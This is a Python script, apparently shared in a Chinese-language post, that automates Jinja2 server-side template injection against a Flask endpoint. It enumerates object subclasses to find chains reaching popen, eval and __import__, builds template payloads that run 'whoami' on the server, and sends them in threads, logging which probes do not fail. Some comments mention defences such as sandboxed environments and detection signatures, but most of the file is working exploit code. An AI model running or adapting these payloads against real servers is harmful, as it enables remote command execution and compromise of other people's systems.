抛开代码丑不谈,用起来还是挺好用滴。
from flask import Flask, request
from jinja2 import Template
from threading import Thread
import requests
import os
import sys
# Probe collections: filled by scan() and drained by check_active() (one
# thread per key in the __main__ block). Each key names one gadget family
# from scan_list; each list holds the generated probe URLs for that family.
url_dict = {
    "popen": [],
    "eval": [],
    "__import__": [],
}
# Gadget table: key -> (attribute path appended to a subclass, call suffix).
# scan() eval()s "item." + path and tests whether the key is present in the
# resulting mapping (e.g. the module globals reached via __init__.__globals__);
# both halves are then spliced into the template expression of the probe URL.
# From a defensive standpoint every chain here depends on dunder attribute
# access (__init__, __globals__, __builtins__), which jinja2's
# SandboxedEnvironment refuses, and the tokens __class__/__subclasses__/
# __globals__ inside a request parameter are a reliable detection signature.
scan_list = {
    "popen": ("__init__.__globals__", "['popen']('whoami').read()"),
    "eval": ("__init__.__globals__['__builtins__']", "['eval'](\"__import__('os').popen('whoami').read()\")"),
    "__import__": ("__init__.__globals__['__builtins__']", "['__import__']('os').system('whoami')")
}
# Target: a local Flask app whose "404_url" query parameter is rendered as a
# template (the injection point). Only the template expression is appended
# to this constant; nothing else in the script derives from the URL.
site = "http://127.0.0.1:5000/waewe?404_url="
def scan():
    """Enumerate object subclasses in THIS interpreter and build probe URLs.

    Walks ``"".__class__.__mro__[-1].__subclasses__()`` (the direct
    subclasses of ``object``) and, for every class whose
    ``__init__.__globals__`` (or its ``__builtins__``) contains one of the
    scan_list keys, appends a probe URL to the matching url_dict list.
    Returns None; its only effect is filling url_dict.

    The recorded index ``num`` is the position in the local interpreter's
    subclass list, so a probe only lines up on the target if that process
    has a comparable Python build and import set — presumably assumed by
    the author; the script never checks it.
    """
    num = 0  # index into the subclass list; kept aligned even on errors
    for item in "".__class__.__mro__[-1].__subclasses__():
        try:
            for ii in scan_list:
                # e.g. eval("item.__init__.__globals__") yields that
                # function's module globals; the key test asks whether this
                # class pulls in the gadget (such as ``popen`` from ``os``).
                if ii in eval("item." + scan_list[ii][0]):
                    # "%s" leaves braces alone, so the literal ``{{{}`` is the
                    # Jinja2 ``{{`` delimiter followed by ``{}``, whose
                    # __class__.__base__ is object. The trailing "\n" is kept
                    # and later acts as the line terminator in result.txt.
                    url = "%s{{{}.__class__.__base__.__subclasses__()[%s].%s%s}}\n" % (
                        site,
                        num,
                        scan_list[ii][0],
                        scan_list[ii][1]
                    )
                    url_dict[ii].append(url)
            num += 1
        except:
            # Classes with a C-level __init__ typically have no __globals__
            # (AttributeError), and ``in`` on a non-mapping raises TypeError;
            # the index is still advanced so later positions stay correct.
            num += 1
def check_active(url):
    """Request each probe URL in ``url`` and append the non-5xx ones to result.txt.

    Args:
        url: one url_dict entry — a list of probe URLs, each already ending
            in "\\n" as built by scan().

    A URL is recorded when the response status is below 500, so 2xx, 3xx
    and 4xx are all treated as "rendered"; a 403 or 404 counts as active
    too, and a recorded line does not by itself show that the injected
    expression evaluated — only that the server did not error. Returns
    None. Several threads run this at once (see __main__), all appending
    to the same file. Depends on ``requests``, which is not standard library.
    """
    with open("result.txt", "a", encoding="utf-8") as f:
        for i in url:
            # No timeout is passed, so this blocks as long as the server does.
            status_code = requests.get(i).status_code
            if not status_code >= 500:
                f.write(i)  # i already carries its trailing newline
        f.close()  # redundant: the with block closes the file on exit
# Entry point: build the probes, reset the result file, then check each
# gadget family in its own thread and wait for all of them to finish.
if __name__ == '__main__':
    scan()
    # Start from a clean file: check_active() opens it in append mode.
    if os.path.exists("result.txt"):
        os.remove("result.txt")
    t_list = []
    for i in url_dict:
        # One worker per url_dict key; all of them append to result.txt.
        t = Thread(target=check_active, args=(url_dict[i],))
        t.start()
        t_list.append(t)
    for t in t_list:
        t.join()
    # (zh) "Done; see the result.txt file in the current directory!!"
    print("创建完成,请查看当前路径下的 result.txt 文件!!")